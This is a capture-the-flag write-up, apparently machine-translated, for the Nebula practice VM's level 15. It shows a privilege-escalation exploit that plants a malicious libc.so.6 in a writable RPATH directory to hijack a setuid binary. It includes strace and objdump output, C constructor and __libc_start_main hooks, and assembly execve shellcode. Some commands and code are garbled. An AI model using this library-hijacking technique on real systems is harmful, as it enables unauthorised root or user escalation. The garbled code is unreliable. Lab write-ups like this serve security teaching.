Description
Nebula is a virtual machine for Linux to exploit the vulnerability exercise, and its 15th Level15 provides such a vulnerable program FLAG15
sh-4.2$ ls-ltotal 7-rwsr-x---1 flag15 level15 7161 2011-11-20 21:22 flag15sh-4.2$ whoamilevel15
The SETUID program is required to exploit the vulnerability, from user level15 to User flag15, execute/bin/getflag.
2. Vulnerability Mining
This problem is a classic dynamic link library hijacking topic, first with strace observation flag15
Execve ("./flag15", ["./flag15"], [/* 19 vars */]) = 0brk (0) = 0x880e000access ("/ Etc/ld.so.nohwcap ",  F_OK) = -1 ENOENT (No such file or directory) 5/i686/sse2/cmov/libc.so.6 ", o_rdonly) = -1 ENOENT (no such file or directory) Stat64 ("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 enoent (no such file or directory) Open ("/var/tmp/flag15/i686/sse2/ Libc.so.6 ", o_rdonly) = -1 ENOENT (no such file or directory) Stat64 ("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (no such file or directory) Open ("/Var/tmp/flag15/i686/cmov/libc.so.6 ", o_rdonly) = -1 ENOENT (no such file or directory) Stat64 ("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT ( no such file or directory) Open ("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (no such file or directory) stat64 ("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (no such file or directory) Open ("/var/tmp/ Flag15/sse2/cmov/libc.so.6 ", o_rdonly) = -1 ENOENT (no such file or directory) Stat64 ("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (no such file or directory) Open ("/var/tmp/flag15/sse2/libc.so.6", o_rdonly) = -1 ENOENT (no such file or directory) stat64 ("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 enoent (No such file ...open ("/var/tmp/flag15/libc.so.6", o_rdonly) = 3...exit_ Group ( ) = ?
It is found that the program is linked to a dynamic link library named Libc.so.6, but the/var/tmp directory is writable for the current user (level15), so you can write a custom libc.so.6 in that directory for the program FLAG15 link
We looked further at Flag15 's header information and found that it did rely on lib.so.6 and compiled with Rpath, which indicates that FLAG15 searches for the path/var/tmp/flag15 that contains the dynamic link library at run time, and allows Setuid to execute (ld_ Preload compilation does not allow Setuid execution).
Sh-4.2$ objdump -p /home/flag15/flag15/home/flag15/flag15: file format elf32-i386Program Header: PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2 filesz 0x00000120 memsz 0x00000120 flags r-x interp off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0 filesz 0x00000013 memsz 0x00000013 flags r-- load off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 filesz 0x000005d4 memsz 0x000005d4 flags r-x load off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12 filesz 0x00000108 memsz 0x00000110 flags rw- DYNAMIC off 0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2 filesz 0x000000d0 memsz 0x000000d0 flags rw- NOTE off 0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2 filesz 0x00000044 memsz 0x00000044 flags r--eh_frame off 0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2 filesz 0x00000034 memsz 0x00000034 flags r-- stack off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2 filesz 0x00000000 memsz 0x00000000 flags rw- RELRO off 0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0 filesz 0x000000f4 memsz 0x000000f4 flags r--dynamic Section: NEEDED libc.so.6 RPATH /var/tmp/flag15 INIT 0x080482c0 FINI 0x080484ac gnu_hash 0x080481ac STRTAB 0x0804821c SYMTAB 0x080481cc STRSZ 0x0000005a syment 0x00000010 DEBUG 0x00000000 pltgot 0x08049ff4 PLTRELSZ 0x00000018 pltrel 0x00000011 Jmprel 0x080482a8 REL 0x080482a0 RELSZ 0x00000008 RELENT 0x00000008 VERNEED 0x08048280 VERNEEDNUM 0x00000001 VERSYM 0x08048276version references: required from libc.so.6: 0x0d696910 0x00 02 glibc_2.0
3. Exploit
The rest of the matter is to write our custom libc.so.6 in the/var/tmp/flag15 directory, hijack Flag15, power to run/bin/getflag.
The first thing to do is hook the function used by the FLAG15 runtime, here are two points to choose from. One is to declare your function through the GCC __attribute ((constructor)) modifier, which can be found in the Linux dynamic link library portal _init Functions before the function is completed, and the second is to add their own function in the int __libc_start_main function.
Use the first method of writing:
sh-4.2$ cat constructor.c #include <stdio.h>void __attribute ((constructor)) init () {System ("/bin/getflag");}
Compile
Gcc-shared-fpic-o libc.so.6 constructor.c
The second method of writing
sh-4.2$ cat shell.c #include <unistd.h>int __libc_start_main (int (*main) (int, char * *, char * *), int argc, char *ar GV, Void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {System ("/bin/getflag");}
Compile
Gcc-shared-fpic-o libc.so.6 SHELL.C
Get libc.so.6
And then execute
sh-4.2$/HOME/FLAG15/FLAG15/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required BY/HOME/FLAG15/FLAG15)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/ var/tmp/flag15/libc.so.6)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/var/tmp/flag15/libc.so.6)/home/flag15/flag15:relocation error:/var/tmp/flag15/libc.so.6:symbol __cxa_finalize , version glibc_2.1.3 not defined in file libc.so.6 with link time reference
It is suggested from the above that a _cxa_finalize function is missing, so the constructor.c or shell.c in both methods can be added
void __cxa_finalize (void) {return;}
Modify CONSTRUCTOR.C to contructor1.c, and then compile again
sh-4.2$ Gcc-shared-fpic-o libc.so.6 contructor1.c
And then execute
sh-4.2$/HOME/FLAG15/FLAG15/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required BY/HOME/FLAG15/FLAG15)/HOME/FLAG15/FLAG15:/var/tmp/flag15/libc.so.6:no version information available (required by/ var/tmp/flag15/libc.so.6)/home/flag15/flag15:relocation Error:/var/tmp/flag15/libc.so.6:symbol system, version glibc_2.0 not defined in file libc.so.6 with link time reference
The above hint also lacks the glibc version information. So we provide a version script to use at compile time
Continue compiling and executing
sh-4.2$ Cat version glibc_2.0 {};sh-4.2$ gcc-shared-fpic-o libc.so.6 contructor1.c-wl,--version-script=version sh- 4.2$/home/flag15/flag15/home/flag15/flag15:relocation Error:/var/tmp/flag15/libc.so.6:symbol system, Version GLIBC _2.0 not defined in file libc.so.6 with link time reference
There is still a hint of error, and the system function does not appear to be found. There are two ways to solve this, one is to compile the static link library to satisfy all the dependencies (why?), and the other is to write your own system functions in assembly language.
The first method:
sh-4.2$ gcc-fpic-shared-static-libgcc-wl,--version-script=version,-bstatic-o libc.so.6 contructor1.c sh-4.2$/home/ FLAG15/FLAG15 you has successfully executed Getflag on a target account/home/flag15/flag15:relocation error:/HOME/FLAG1 5/flag15:symbol __libc_start_main, version glibc_2.0 not defined in file libc.so.6 with link time reference
The second method:
sh-4.2$ cat shell.c #include <unistd.h>void __cxa_finalize (void *d) {}int __libc_start_main (int (*main) (Int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) { system ();}
sh-4.2$ cat system.s.section. Text.globl Systemsystem:mov $getflag,%ebxxor%edx,%edxpush%edxpush%ebxmov%esp,%ecxmov $ One by one,%eax; EXECVE system calls int $0x80.section. Datagetflag:. ASCII "/bin/getflag\0" sh-4.2$ gcc-shared-fpic-o libc.so.6 Shell . C SYSTEM.S-WL,--version-script=version sh-4.2$/home/flag15/flag15 you had successfully executed Getflag on a target Account
Personally, the method of writing shellcode is easier to understand than the way the static link library compiles, and has not yet figured out why static linking can solve the system function.
Reference
www.pwntester.com/blog/2013/11/26/nebula-level15-write-up/
Https://github.com/1u4nx/Exploit-Exercises-Nebula
dynamic-link libraries under Linux contain vulnerabilities